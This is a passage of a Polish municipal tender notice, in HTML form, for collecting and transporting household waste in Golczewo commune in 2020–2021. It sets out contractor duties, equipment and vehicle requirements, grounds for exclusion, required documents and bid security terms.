ustalonym z Zamawiającym formacie);Zakres dodatkowej sprawozdawczości obejmuje:a) raporty miesięczne zawierające informacje o ilościach i rodzajach odpadów (oraz ilościach i rodzajach pojemników i kontenerów opróżnionych w związku z odbiorem tych odpadów) od właścicieli nieruchomości w ramach harmonogramu;b) raporty miesięczne zawierające informacje o ilościach i rodzajach odpadów (a także ilościach odebranych worków oraz rodzajach i ilościach pojemników i kontenerów opróżnionych w związku z odbiorem tych odpadów wraz ze wskazaniem nieruchomości, której odbiór dotyczył) odebranych od właścicieli nieruchomości poza harmonogramem;c) informacje z systemów GPS dotyczące wszystkich przejazdów pojazdów transportujących odpady w zakresie: tras przejazdów każdego z pojazdów, miejsc zatrzymania pojazdów, a także momentów załadunku lub wyładunku odpadów (otwierania klapy w przypadku pojazdów typu śmieciarka i pojazdów typu HDS, oraz załadunku lub wyładunku kontenera w przypadku pojazdów typu „hakowiec” lub „bramowiec”);d) raporty miesięczne zawierające informacje o ilości wydanych worków;e) na koniec każdego miesiąca Wykonawca ma obowiązek przedłożyć Zamawiającemu potwierdzenie przekazania odpadów odebranych w danym miesiącu do Instalacji Kartą Przekazania Odpadów. Przekazanie Karty jest podstawą do zapłaty faktury.5) opracowanie i przestrzeganie harmonogramu odbioru odpadów komunalnych od właścicieli nieruchomości znajdujących się na terenie gminy Golczewo, zgodnego z założeniami niniejszego dokumentu oraz Regulaminem utrzymania czystości i porządku na terenie gminy Golczewo.22. Szczegółowe wymagania stawiane Wykonawcy zamówienia:1) wyposażenie PSZOK w następujące ilości i rodzaje odpowiednio oznaczonych pojemników:a) kontener stalowy o pojemności 10 m3 na odpady wielkogabarytowe– 1 szt.,b) pojemniki stalowe o pojemności 5 m3 na zużyty sprzęt elektryczny i elektroniczny i odpady budowlane i rozbiórkowe stanowiące odpady komunalne – 2 szt.,c) pojemniki na akumulatory o pojemności 0,6 m3 – 2 szt.,d) pojemniki na świetlówki o pojemności do 140 szt. – 2 szt.,e) pojemnik na przeterminowane leki – 1 szt.,f) pojemniki o pojemności 1100 l na odpady zielone – 2 szt.,g) pojemniki o pojemności 1100 l na tworzywa sztuczne i metale – 2 szt.,h) pojemniki o pojemności 1100 l na papier i tekturę – 2 szt.i) Pojemnik o pojemności 120 l na odpady niekwalifikujące się do odpadów medycznych powstałych w gospodarstwie domowym w wyniku przyjmowania produktów leczniczych w formie iniekcji i prowadzenia monitoringu poziomu substancji we krwi, w szczególności igieł i strzykawek – 1 szt.,str. 7j) Pojemnik o pojemności 1100 l na tekstylia – 1 szt.;2) wyposażenie nieruchomości wielorodzinnych oraz nieruchomości, na których nie zamieszkują mieszkańcy a powstają odpady komunalne, w następujące ilości oraz rodzaje pojemników na odpady komunalne (dane szacunkowe):a) pojemniki 1100 l - 148 szt.,b) pojemniki 240 l - 91 szt.,c) pojemniki 120 l – 49 szt.,d) worki o pojemności min. 80 l - 235 szt/m-c.;e) wyposażenie nieruchomości jednorodzinnych w worki do gromadzenia odpadów komunalnych o pojemności minimum 80 l (dopuszcza się możliwość wyposażania nieruchomości jednorodzinnych w pojemniki z inicjatywy i na koszt Wykonawcy zamówienia). Szacowana ilość dostarczanych worków w skali miesiąca wynosi 6000 szt;3) Ilość i jakość dostarczanych worków do gromadzenia odpadów komunalnych zbieranych w sposób selektywny powinna odpowiadać ilości i rodzajowi odebranych odpadów z terenu danej nieruchomości, jednak z założeniem nie mniej niż 1 szt. na 1 rodzaj odpadów gromadzonych selektywnie;4) dostarczenie wskazanych w pkt. 1 i 2 pojemników oraz worków pod wskazane przez Zamawiającego adresy w terminie do dnia 01.03.2020 r.;5) osiągnięcia poziomów recyklingu, przygotowania do ponownego użycia i odzysku innymi metodami frakcji odpadów komunalnych:a) składających się z papieru, metali, tworzyw sztucznych i szkła, tj. co najmniej 50% w 2020 i 2021 r.,b) składających się z innych niż niebezpieczne odpady budowlane i rozbiórkowe, tj. co najmniej 70% w 2020 i 2021 r.,- zgodnie z Rozporządzeniem Ministra Środowiska z dnia 14 grudnia 2016 r. w sprawie poziomów recyklingu, przygotowania do ponownego użycia i odzysku innymi metodami niektórych frakcji odpadów komunalnych (Dz. U. Z 2016 r. poz. 2167).6) ponoszenie pełnej odpowiedzialności wobec Zamawiającego i osób trzecich za szkody na mieniu i zdrowiu osób trzecich lub Zamawiającego, powstałe podczas i w związku z realizacją przedmiotu umowy;7) naprawa lub ponoszenie (wg wyboru Zamawiającego) kosztów naprawy szkód wyrządzonych podczas wykonywania usługi wywozu odpadów komunalnych w Gminie (uszkodzenia chodników osiedlowych, ogrodzenia, punktów do składowania odpadów itp.);8) posprzątanie rozsypanych odpadów, będących wynikiem nieodpowiedniego opróżniania pojemników na odpady komunalne i odstawienie pojemników na miejsca, z których zostały odebrane. Obowiązkiem Wykonawcy jest pozostawienie porządku i czystości w miejscach odbioru odpadów. Obowiązek ten winien być realizowany niezwłocznie po opróżnieniu pojemników, kontenerów;9) odbieranie z nieruchomości również odpadów komunalnych selektywnie zbieranych zgromadzonych w miejscu lokalizacji pojemników i worków, ale poza tymi pojemnikami i workami;10) w przypadkach jednostkowych i występujących sporadycznie (np. odbiór odpadów typu kartony po urządzeniach i meblach wielkogabarytowych) Wykonawca odbiera te odpady w ramach obowiązku wykonywania ogólnej usługi przedmiotu zamówienia i pozostawia w danym miejscu czystość i porządek. Natomiast w przypadkach systematycznego gromadzenia odpadów selektywnie zbieranych poza pojemnikami i workami Wykonawca zobowiązany jest dodatkowo niezwłocznie powiadomić o tymstr. 8fakcie Zamawiającego z podaniem odpowiednich danych adresowych i osobowych właściciela nieruchomości;11) pojemniki oraz worki powinny być dostosowane do wymagań wynikających z Regulaminu utrzymania czystości i porządku na terenie Gminy Golczewo;12) odbieranie od właścicieli nieruchomości odpadów komunalnych zbieranych selektywnie zgromadzonych w innych workach lub pojemnikach niż dostarczone przez Wykonawcę pod warunkiem, że spełniają one wymagania określone w Regulaminie utrzymania czystości i porządku na terenie Gminy Golczewo;13) wykonanie przedmiotu umowy w sposób fachowy, niepowodujący niepotrzebnych przeszkód oraz ograniczający niedogodności dla mieszkańców Gminy Golczewo do niezbędnego minimum;14) zapewnienie, dla właściwej realizacji przedmiotu umowy, przez cały czas trwania umowy dostatecznej ilości środków technicznych, gwarantujących terminowe i jakościowe wykonanie zakresu rzeczowego usługi;15) wyposażenie własnych pracowników zajmujących się wywozem odpadów w odzież ochronną z widocznym logo firmy;16) dokonywanie odbioru i transportu odpadów, również w przypadkach, kiedy dojazd do punktów zbiórki odpadów komunalnych będzie utrudniony z powodu prowadzonych remontów dróg, dojazdów itp. W takich przypadkach Wykonawcy nie przysługują roszczenia z tytułu wzrostu kosztów realizacji przedmiotu umowy;17) ponoszenie pełnej odpowiedzialności za należyte wykonanie powierzonych czynności zgodnie z obowiązującymi przepisami i normami;18) okazanie na żądanie Zamawiającego wszelkich dokumentów potwierdzających wykonywanie przedmiotu umowy zgodnie z określonymi przez Zamawiającego wymaganiami i przepisami prawa;19) worki oraz pojemniki mają być oznaczone zgodnie z Rozporządzeniem Ministra Środowiska z dnia 29 grudnia 2016 r. w sprawie szczegółowego sposobu selektywnego zbierania wybranych frakcji odpadów (Dz. U. Z 2017 r. poz. 19).23. Stosownie do treści art. 29 ust. 3a ustawy Pzp zamawiający wymaga zatrudnienia przez wykonawcę lub podwykonawcę na podstawie umowy o pracę osób wykonujących czynności w zakresie realizacji zamówienia, których wykonanie polega na wykonywaniu pracy w sposób określony w art. 22 § 1 ustawy z dnia 26 czerwca 1974 r. - Kodeks pracy. Są to następujące czynności:1) kierowanie pojazdami przeznaczonymi do wywozu odpadów,2) obsługa załadunku odpadów do pojazdów,3) sprawowanie nadzoru nad realizacją przedmiotu umowy,4) sprawozdawczość i raportowanie.24. Dane osób (imię i nazwisko oraz stanowisko pracy) wykonujących czynności wskazane w ust. 23 zostaną ujęte w formie wykazu i przekazane Zamawiającemu w terminie 10 dni od dnia podpisania umowy. Powyższy obowiązek wykonawcy dokumentowania zatrudnienia osób obejmuje także pracowników podwykonawców.25. Zamawiający zastrzega sobie prawo przeprowadzenia kontroli na miejscu wykonywania zamówienia w celu weryfikacji, czy osoby wykonujące czynności przy realizacji zamówienia są osobami wskazanymi przez wykonawcę</span> <br/> <br/> <b>II.5) Główny kod CPV: </b> <span id="ctl00_ContentPlaceHolder1_cpv_glowny_przedmiot">90500000-2</span> <br/> <b> Dodatkowe kody CPV:</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kod CPV</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>90512000-9</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>90513200-8</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>90513100-7</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>90511000-2</TD></TR></TABLE> <br /> <br /> <b> II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>: <br/> Wartość bez VAT: <span id="ctl00_ContentPlaceHolder1_szacunkowa_wartosc_zamowienia_calosc"></span> <br/> Waluta: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_waluta_calosc"></span> <br/> <i>(w przypadku umów ramowych lub dynamicznego systemu zakupów – szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i> </div> <br/> <b> II.7) Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: </b> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67">Nie</span> <br/> Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67_tekst"></span> <br/> <b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b> <br /> miesiącach:&#160; <span id="ctl00_ContentPlaceHolder1_okres_w_miesiacach"></span> &#160;<i> lub </i> <b> dniach:</b> <span id="ctl00_ContentPlaceHolder1_okres_w_dniach"></span> <br /> <i>lub</i> <br /> <b> data rozpoczęcia: </b> <span id="ctl00_ContentPlaceHolder1_data_rozpoczecia">2020-03-01</span> &#160;<i> lub </i><b> zakończenia: </b> <span id="ctl00_ContentPlaceHolder1_data_zakonczenia">2021-02-28</span> <br /> <br/> <b>II.9) Informacje dodatkowe: </b> <span id="ctl00_ContentPlaceHolder1_informacje_na_temat_katalogow"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b> III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU </b> <br/> <div style="padding-left: 20px"> <b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_okreslenie_warunkow">Wykonawca posiada wpis do rejestru działalności regulowanej uprawniający do prowadzenia działalności na terenie Gminy Golczewo w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości oraz zezwolenie na transport odpadów wydane na podstawie ustawy o odpadach.</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_okreslenie_warunkow">1. Wykonawcy, którzy nie wykażą spełnienia warunków udziału w postępowaniu, podlegać będą wykluczeniu z udziału w postępowaniu. Ofertę Wykonawcy wykluczonego uznaje się za odrzuconą.2. Ocena spełniania wyżej opisanych warunków udziału w postępowaniu dokonywana będzie w oparciu o złożone przez Wykonawcę w niniejszym postępowaniu dokumenty oraz oświadczenia na zasadzie SPEŁNIA/NIE SPEŁNIA.</span> <br/> <b>III.1.2) Sytuacja finansowa lub ekonomiczna </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_okreslenie_warunkow">Zamawiający nie precyzuje w powyższym zakresie żadnych wymagań</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_informacje_dodatkowe"></span> <br/> <b>III.1.3) Zdolność techniczna lub zawodowa </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_okreslenie_warunkow">a)	Wykonawca posiada niezbędną wiedzę i doświadczenie, tj. Wykonawca wykazał realizację usług odpowiadających zakresem usługom stanowiącym przedmiot zamówienia w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie. Zakres zrealizowanych usług powinien obejmować wykonanie usług odbierania odpadów komunalnych w ilościach minimum 1 000 ton/rok, w tym minimum 50 ton/rok odpadów komunalnych selektywnie zebranych (wykaz wykonanych usług, załącznik nr 8 do SIWZ).b)	Wykonawca dysponuje odpowiednim potencjałem technicznym niezbędnym do wykonania zamówienia, a w szczególności posiada (wykaz sprzętu – wzór stanowi załącznik nr 10 do SIWZ):•	co najmniej dwa pojazdy przystosowane do odbierania odpadów komunalnych zmieszanych (śmieciarki);•	co najmniej dwa pojazdy przystosowane do odbioru selektywnie zebranych odpadów komunalnych;•	co najmniej jeden pojazd do odbierania odpadów bez funkcji kompaktującej;•	co najmniej jeden pojazd do transportu kontenerów o dużej pojemności,•	posiadania pojazdu lub specjalistycznego urządzenia do dezynfekcji pojemników, •	prawo do dysponowania jedną bazą magazynowo-transportową (spełniającą wymogi rozporządzenia Ministra Środowiska z dnia 11 stycznia 2013 r. w sprawie szczegółowych wymagań w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości oraz rrozporządzenia Ministra Środowiska z dnia 16 czerwca 2009 r. w sprawie bezpieczeństwa i higieny pracy przy gospodarowaniu odpadami komunalnymi - Dz. U. z 2009 r. nr 104 poz. 686) usytuowaną w gminie Golczewo lub odległości nie większej niż 60 km od granicy gminy i na terenie, do którego posiada tytuł prawny,c)	w zakresie wymagań technicznych dotyczących wyposażenia pojazdów Wykonawca zapewnia aby:•	konstrukcja pojazdów zabezpieczała przed rozwiewaniem i rozpylaniem przewożonych odpadów oraz minimalizowała oddziaływanie czynników atmosferycznych na odpady; •	pojazdy były wyposażone w system monitoringu bazującego na systemie pozycjonowania satelitarnego, umożliwiający trwałe zapisywanie, przechowywanie i odczytywanie danych o położeniu pojazdu i miejscach postojów;•	pojazdy były wyposażone w czujniki zapisujące dane o miejscach wyładunku odpadów umożliwiające weryfikację tych danych; •	pojazdy były wyposażone w narzędzia lub urządzenia umożliwiające sprzątanie terenu po opróżnieniu pojemników.</span> <br/> Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób: <span id="ctl00_ContentPlaceHolder1_czy_zdolnosc_techniczna_wymaga_wykonawcow">Nie</span> <br/> Informacje dodatkowe: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_informacje_dodatkowe">1. Wykonawcy, którzy nie wykażą spełnienia warunków udziału w postępowaniu, podlegać będą wykluczeniu z udziału w postępowaniu. Ofertę Wykonawcy wykluczonego uznaje się za odrzuconą.2. Ocena spełniania wyżej opisanych warunków udziału w postępowaniu dokonywana będzie w oparciu o złożone przez Wykonawcę w niniejszym postępowaniu dokumenty oraz oświadczenia na zasadzie SPEŁNIA/NIE SPEŁNIA.</span> </div> <b> III.2) PODSTAWY WYKLUCZENIA </b> <br/> <div style="padding-left: 20px"> <b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1 ustawy Pzp</b> <br/> <b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b> <span id="ctl00_ContentPlaceHolder1_czy_zamawiajacy_przewiduje_wykluczenie">Tak</span> Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia: <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_1">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_2"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_3"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_4">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 4 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_5">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 5 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_6"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_7"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_8">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 8 ustawy Pzp)</span> <br/> </div> <b> III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI </b> <br/> <div style="padding-left: 20px"> <b> Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_niepodleganiu_wykluczenia">Tak</span> <br/> <b> Oświadczenie o spełnianiu kryteriów selekcji </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_spelnienie_kryteriow">Nie</span> </div> <b> III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP: </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_dokumentow_zaswiadczen">W celu wykazania braku podstaw do wykluczenia z postępowania o udzielenie zamówienia Wykonawcy w okolicznościach, o których mowa w art. 24 ust. 1 pkt 12-23 oraz ust. 5 pkt 1, 4, 5 i 8 ustawy Pzp Zamawiający, po wyborze najkorzystniejszej oferty wezwie Wykonawcę do złożenia następujących dokumentów:1)	informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 13, 14 lub 21 oraz art. 24 ust. 5 pkt 5 ustawy Pzp, wystawioną nie wcześniej aniżeli na 6 miesięcy przed upływem terminu składania ofert;2)	oświadczenia Wykonawcy o braku wydania wobec niego prawomocnego wyroku sądu lub ostatecznej decyzji administracyjnej o zaleganiu z uiszczaniem podatków, opłat lub składek na ubezpieczenia społeczne lub zdrowotne albo – w przypadku wydania takiego wyroku lub decyzji – dokumentów potwierdzających dokonanie płatności tych należności wraz z ewentualnymi odsetkami lub grzywnami lub zawarcie wiążącego porozumienia w sprawie spłat tych należności;3)	oświadczenie Wykonawcy o braku orzeczenia wobec niego tytułem środka zapobiegawczego zakazu ubiegania się o zamówienia publiczne;4)	aktualnego odpisu z właściwego rejestru lub centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 5 pkt 1 ustawy Pzp, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;5)	aktualnego zaświadczenia właściwego naczelnika urzędu skarbowego potwierdzającego, że Wykonawca nie zalega z opłacaniem podatków, lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania ofert;6)	aktualnego zaświadczenia właściwego terenowego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzającego, że Wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert lub inny dokument potwierdzający, że Wykonawca zawarł porozumienie z właściwym organem w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu;7)	oświadczenie Wykonawcy o niezaleganiu z opłacaniem podatków i opłat lokalnych, o których mowa w ustawie z dnia 12 stycznia 1991 r. o podatkach i opłatach lokalnych (Dz. U. z 2019 r. poz. 1170).</span> </div> <b> III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_warunkow_udzialu">Zamawiający przed udzieleniem zamówienia wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym, nie krótszym niż 5 dni terminie, aktualnych na dzień złożenia następujących oświadczeń lub dokumentów potwierdzających spełnienie warunków udziału w postepowaniu:1)	potwierdzających wpis do rejestru podmiotów wprowadzających produkty, produkty w opakowaniach i gospodarujących odpadami prowadzonego przez właściwego Marszałka Województwa - do czasu utworzenia rejestru Wykonawca zobowiązany jest posiadać zezwolenie na zbieranie i transport odpadów wydane na podstawie ustawy o odpadach;2)	potwierdzających wpis do rejestru podmiotów zbierających zużyty sprzęt elektryczny i elektroniczny prowadzony przez Głównego Inspektora Ochrony Środowiska;3)	wykazu wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych usług, w okresie ostatnich 3 (trzech) lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie (spełniających warunek wykonania usług odbierania odpadów komunalnych w ilościach minimum 1 000 ton/rok, w tym minimum 50 ton/rok odpadów selektywnie zebranych), z podaniem ich wartości, przedmiotu, datą wykonania i podmiotów, na rzecz których usługi zostały wykonane oraz załączeniem dowodów (referencji), że te usługi zostały wykonane lub są wykonywane należycie (wzór stanowi załącznik nr 8 do SIWZ);4)	wykazu narzędzi (pojazdów, sprzętu, informacja o bazie magazynowo-transportowej) w posiadaniu Wykonawcy w celu realizacji zamówienia publicznego (wzór stanowi załącznik nr 10 do SIWZ);</span> <br/> <b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_kryteriow_selekcji"></span> </div> <b> III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_potwierdzenie_okolicznosci"></span> </div> <b> III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6) </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_inne_dokumenty_niewymienione"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA IV: PROCEDURA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>IV.1) OPIS </b> <br/> <b>IV.1.1) Tryb udzielenia zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_tryb_udzielenia_zamowienia">Przetarg nieograniczony</span> <br/> <b>IV.1.2) Zamawiający żąda wniesienia wadium:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wadium">Tak</span> <br/> Informacja na temat wadium <br/> <span id="ctl00_ContentPlaceHolder1_wadium">1.	Zamawiający żąda od Wykonawców wniesienia wadiumKwota wadium wynosi 10 000,00 zł. (słownie: dziesięć tysięcy złotych, 00/100)2.	Wadium wnosi się przed upływem terminu składania ofert. Terminem wpłaty wadium jest uznanie na rachunku bankowym Zamawiającego ww. kwoty. Na poleceniu przelewu należy dokonać następującej adnotacji: „Wadium do postępowania nr ZZF.271.1.2020”.3.	Wadium może być wniesione w jednej lub kilku następujących formach:1)	pieniądzu,2)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo –kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym,3)	gwarancjach bankowych,4)	gwarancjach ubezpieczeniowych,5)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2018 r. poz. 110 z późn. zm.) 4.	Uwaga: dokument gwarancji bankowych, ubezpieczeniowych lub poręczeń winien zawierać wyszczególnione warunki utraty kwoty wadium przez Wykonawcę (zatrzymania wadium przez Zamawiającego), tj. w sytuacjach określonych w art. 46 ust. 4a i 5 ustawy Pzp. 5.	Wniesione wadium musi zabezpieczać ofertę Wykonawcy przez cały okres związania ofertą, tjj. 30 dni od terminu składania ofert.6.	Potwierdzeniem wniesienia wadium w formie innej niż pieniężna jest oryginalny dokument banku, ubezpieczyciela lub poręczyciela, wystawiony na Zamawiającego – Gminę Golczewo, ul. Zwycięstwa 23, 72-410 Golczewo z oznaczeniem: Dotyczy przetargu nieograniczonego pn.: „Odbiór i transport odpadów komunalnych z terenu gminy Golczewo od właścicieli nieruchomości zamieszkałych i niezamieszkałych” złożony razem z ofertą.7.	Oferta niezabezpieczona wadium zostanie odrzucona.8.	Wykonawca, którego oferta zostanie uznana za najkorzystniejszą, zgodnie z art. 148 ust. 4 ustawy Pzp może wyrazić zgodę na zaliczenie kwoty wadium, które zostało wniesione w pieniądzu, na poczet zabezpieczenia należytego wykonania zamówienia</span> </div> <br/> <b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zaliczek">Nie</span> <br/> Należy podać informacje na temat udzielania zaliczek: <br/> <span id="ctl00_ContentPlaceHolder1_przewiduje_udzielenie_zaliczek"></span> </div> <br/> <b> IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_zlozenie_katalogow_elektronicznych_informacje_dodatkowe"></span> </div> <br/> <b> IV.1.5.) Wymaga się złożenia oferty wariantowej: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_oferty_wariantowej">Nie</span> <br/> Dopuszcza się złożenie oferty wariantowej <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej">Nie</span> <br/> Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej_zasadniczej"></span> </div> <br/> <b> IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu </b> <br/> <i> (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne) </i> <div style="padding-left: 20px"> Liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_liczba_wykonawcow"></span> <br/> Przewidywana minimalna liczba wykonawców <span id="ctl00_ContentPlaceHolder1_minimalna_liczba_wykonawcow"></span> <br/> Maksymalna liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_wykonawcow"></span> <br/> Kryteria selekcji wykonawców: <br/> <span id="ctl00_ContentPlaceHolder1_znaczenie_warunkow_wykonawcow"></span> </div> <br/> <b> IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów: </b> <div style="padding-left: 20px"> Umowa ramowa będzie zawarta: <br/> <span id="ctl00_ContentPlaceHolder1_z_kim_umowa_bedzie_zawarta"></span> <br/> Czy przewiduje się ograniczenie liczby uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_ograniczenie_liczby_uczestnikow"></span> <br/> Przewidziana maksymalna liczba uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow_informacje_dodatkowe"></span> <br/> Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów: <br/> <span 